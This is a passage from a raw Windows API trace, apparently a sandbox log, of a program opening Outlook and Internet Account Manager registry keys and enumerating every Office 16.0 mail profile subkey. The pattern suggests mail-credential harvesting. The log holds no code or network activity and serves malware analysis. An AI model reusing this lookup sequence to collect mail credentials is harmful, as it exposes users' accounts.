(lpString="Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 49 [0590.208] LocalAlloc (uFlags=0x40, uBytes=0x14e) returned 0x63f8c8 [0590.208] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.208] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\Software\\Microsoft\\Internet Account Manager\\Accounts", phkResult=0x52c2e8 | out: phkResult=0x52c2e8*=0x0) returned 0x2 [0590.208] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.208] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x1, lpName=0x52d328, lpcchName=0x52d320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpcchName=0x52d320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.208] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.208] LocalFree (hMem=0x5e6f98) returned 0x0 [0590.208] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Account Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e338 | out: phkResult=0x52e338*=0x4d0) returned 0x0 [0590.208] RegQueryValueExW (in: hKey=0x4d0, lpValueName="Outlook", lpReserved=0x0, lpType=0x52e320, lpData=0x0, lpcbData=0x52e334*=0x0 | out: lpType=0x52e320*=0x0, lpData=0x0, lpcbData=0x52e334*=0x0) returned 0x2 [0590.208] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.208] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Account Manager", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e30c | out: phkResult=0x52e30c*=0x4d0) returned 0x0 [0590.208] RegQueryValueExW (in: hKey=0x4d0, lpValueName="Outlook", lpReserved=0x0, lpType=0x52e2f4, lpData=0x0, lpcbData=0x52e308*=0x0 | out: lpType=0x52e2f4*=0x0, lpData=0x0, lpcbData=0x52e308*=0x0) returned 0x2 [0590.208] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.208] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Account Manager", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2e0 | out: phkResult=0x52e2e0*=0x4d0) returned 0x0 [0590.208] RegQueryValueExW (in: hKey=0x4d0, lpValueName="Outlook", lpReserved=0x0, lpType=0x52e2c8, lpData=0x0, lpcbData=0x52e2dc*=0x0 | out: lpType=0x52e2c8*=0x0, lpData=0x0, lpcbData=0x52e2dc*=0x0) returned 0x2 [0590.208] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.209] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", phkResult=0x52d328 | out: phkResult=0x52d328*=0x0) returned 0x2 [0590.209] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings", phkResult=0x52d318 | out: phkResult=0x52d318*=0x0) returned 0x2 [0590.209] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", phkResult=0x52d308 | out: phkResult=0x52d308*=0x0) returned 0x2 [0590.209] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", phkResult=0x52d2f8 | out: phkResult=0x52d2f8*=0x0) returned 0x2 [0590.209] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", phkResult=0x52d2e8 | out: phkResult=0x52d2e8*=0x4d0) returned 0x0 [0590.209] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x0, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="0a0d020000000000c000000000000046", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.209] lstrlenW (lpString="\\") returned 1 [0590.209] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.209] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.209] lstrlenW (lpString="0a0d020000000000c000000000000046") returned 32 [0590.209] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.209] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.209] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.209] lstrlenW (lpString="") returned 0 [0590.209] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046") returned 88 [0590.209] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.209] LocalFree (hMem=0x56cab0) returned 0x0 [0590.209] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.209] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.209] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.209] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.209] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x1, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="13dbb0c8aa05101a9bb000aa002fc45a", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.209] lstrlenW (lpString="\\") returned 1 [0590.209] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.209] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.209] lstrlenW (lpString="13dbb0c8aa05101a9bb000aa002fc45a") returned 32 [0590.209] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.209] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.209] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.209] lstrlenW (lpString="") returned 0 [0590.209] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a") returned 88 [0590.209] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.209] LocalFree (hMem=0x56cab0) returned 0x0 [0590.209] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.209] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.210] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.210] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.210] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x2, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="189cba75c69c634996739bac92103ebb", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.210] lstrlenW (lpString="\\") returned 1 [0590.210] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.210] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.210] lstrlenW (lpString="189cba75c69c634996739bac92103ebb") returned 32 [0590.210] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.210] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.210] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.210] lstrlenW (lpString="") returned 0 [0590.210] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\189cba75c69c634996739bac92103ebb") returned 88 [0590.210] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.210] LocalFree (hMem=0x56cab0) returned 0x0 [0590.210] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\189cba75c69c634996739bac92103ebb", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.210] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.210] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.210] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.210] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x3, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="1a8bd43e654f65418fbafadeef063a57", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.210] lstrlenW (lpString="\\") returned 1 [0590.210] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.210] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.210] lstrlenW (lpString="1a8bd43e654f65418fbafadeef063a57") returned 32 [0590.210] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.210] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.210] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.210] lstrlenW (lpString="") returned 0 [0590.210] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\1a8bd43e654f65418fbafadeef063a57") returned 88 [0590.210] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.210] LocalFree (hMem=0x56cab0) returned 0x0 [0590.210] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\1a8bd43e654f65418fbafadeef063a57", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.210] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.210] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.210] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.210] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x4, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="1cfb96c6c96b454ebff73da2e9f63f51", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.210] lstrlenW (lpString="\\") returned 1 [0590.210] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.210] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.210] lstrlenW (lpString="1cfb96c6c96b454ebff73da2e9f63f51") returned 32 [0590.210] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.210] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.210] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.210] lstrlenW (lpString="") returned 0 [0590.210] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\1cfb96c6c96b454ebff73da2e9f63f51") returned 88 [0590.210] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.210] LocalFree (hMem=0x56cab0) returned 0x0 [0590.210] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\1cfb96c6c96b454ebff73da2e9f63f51", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.211] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.211] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.211] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.211] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x5, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="3517490d76624c419a828607e2a54604", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.211] lstrlenW (lpString="\\") returned 1 [0590.211] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.211] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.211] lstrlenW (lpString="3517490d76624c419a828607e2a54604") returned 32 [0590.211] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.211] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.211] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.211] lstrlenW (lpString="") returned 0 [0590.211] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604") returned 88 [0590.211] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.211] LocalFree (hMem=0x56cab0) returned 0x0 [0590.211] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.211] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.211] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.211] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.211] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x6, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="467888fc50a6c6448d6cc0cf7b5307d6", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.211] lstrlenW (lpString="\\") returned 1 [0590.211] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.211] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.211] lstrlenW (lpString="467888fc50a6c6448d6cc0cf7b5307d6") returned 32 [0590.211] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.211] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.211] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.211] lstrlenW (lpString="") returned 0 [0590.211] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\467888fc50a6c6448d6cc0cf7b5307d6") returned 88 [0590.211] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.211] LocalFree (hMem=0x56cab0) returned 0x0 [0590.211] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\467888fc50a6c6448d6cc0cf7b5307d6", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.211] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.211] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.211] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.211] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x7, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="48dea081c9634a43a6861907855add5c", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.211] lstrlenW (lpString="\\") returned 1 [0590.211] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.211] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.211] lstrlenW (lpString="48dea081c9634a43a6861907855add5c") returned 32 [0590.211] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.211] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.211] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.211] lstrlenW (lpString="") returned 0 [0590.211] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\48dea081c9634a43a6861907855add5c") returned 88 [0590.211] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.211] LocalFree (hMem=0x56cab0) returned 0x0 [0590.212] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\48dea081c9634a43a6861907855add5c", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.212] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.212] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.212] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.212] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x8, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="55aad8d134512d438564aa678cb92d66", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.212] lstrlenW (lpString="\\") returned 1 [0590.212] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.212] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.212] lstrlenW (lpString="55aad8d134512d438564aa678cb92d66") returned 32 [0590.212] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.212] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.212] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.212] lstrlenW (lpString="") returned 0 [0590.212] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\55aad8d134512d438564aa678cb92d66") returned 88 [0590.212] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.212] LocalFree (hMem=0x56cab0) returned 0x0 [0590.212] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\55aad8d134512d438564aa678cb92d66", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.212] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.212] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.212] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.212] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x9, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="71b0295bef58e344911262b243f005ac", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.212] lstrlenW (lpString="\\") returned 1 [0590.212] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.212] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.212] lstrlenW (lpString="71b0295bef58e344911262b243f005ac") returned 32 [0590.212] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.212] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.212] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.212] lstrlenW (lpString="") returned 0 [0590.212] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\71b0295bef58e344911262b243f005ac") returned 88 [0590.212] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.212] LocalFree (hMem=0x56cab0) returned 0x0 [0590.212] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\71b0295bef58e344911262b243f005ac", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.212] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.212] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.212] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.212] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0xa, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8503020000000000c000000000000046", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.212] lstrlenW (lpString="\\") returned 1 [0590.212] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.212] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.212] lstrlenW (lpString="8503020000000000c000000000000046") returned 32 [0590.212] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.212] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.212] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.213] lstrlenW (lpString="") returned 0 [0590.213] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046") returned 88 [0590.213] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.213] LocalFree (hMem=0x56cab0) returned 0x0 [0590.213] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.213] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.213] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.213] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.213] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0xb, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="9207f3e0a3b11019908b08002b2a56c2", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.213] lstrlenW (lpString="\\") returned 1 [0590.213] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.213] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.213] lstrlenW (lpString="9207f3e0a3b11019908b08002b2a56c2") returned 32 [0590.213] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.213] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.213] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.213] lstrlenW (lpString="") returned 0 [0590.213] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2") returned 88 [0590.213] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.213] LocalFree (hMem=0x56cab0) returned 0x0 [0590.213] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.213] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.213] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.213] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.213] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0xc, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="9375CFF0413111d3B88A00104B2A6676", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.213] lstrlenW (lpString="\\") returned 1 [0590.213] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.213] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.213] lstrlenW (lpString="9375CFF0413111d3B88A00104B2A6676") returned 32 [0590.213] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.213] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.213] LocalFree (hMem=0x5d7c90) returned 0x0 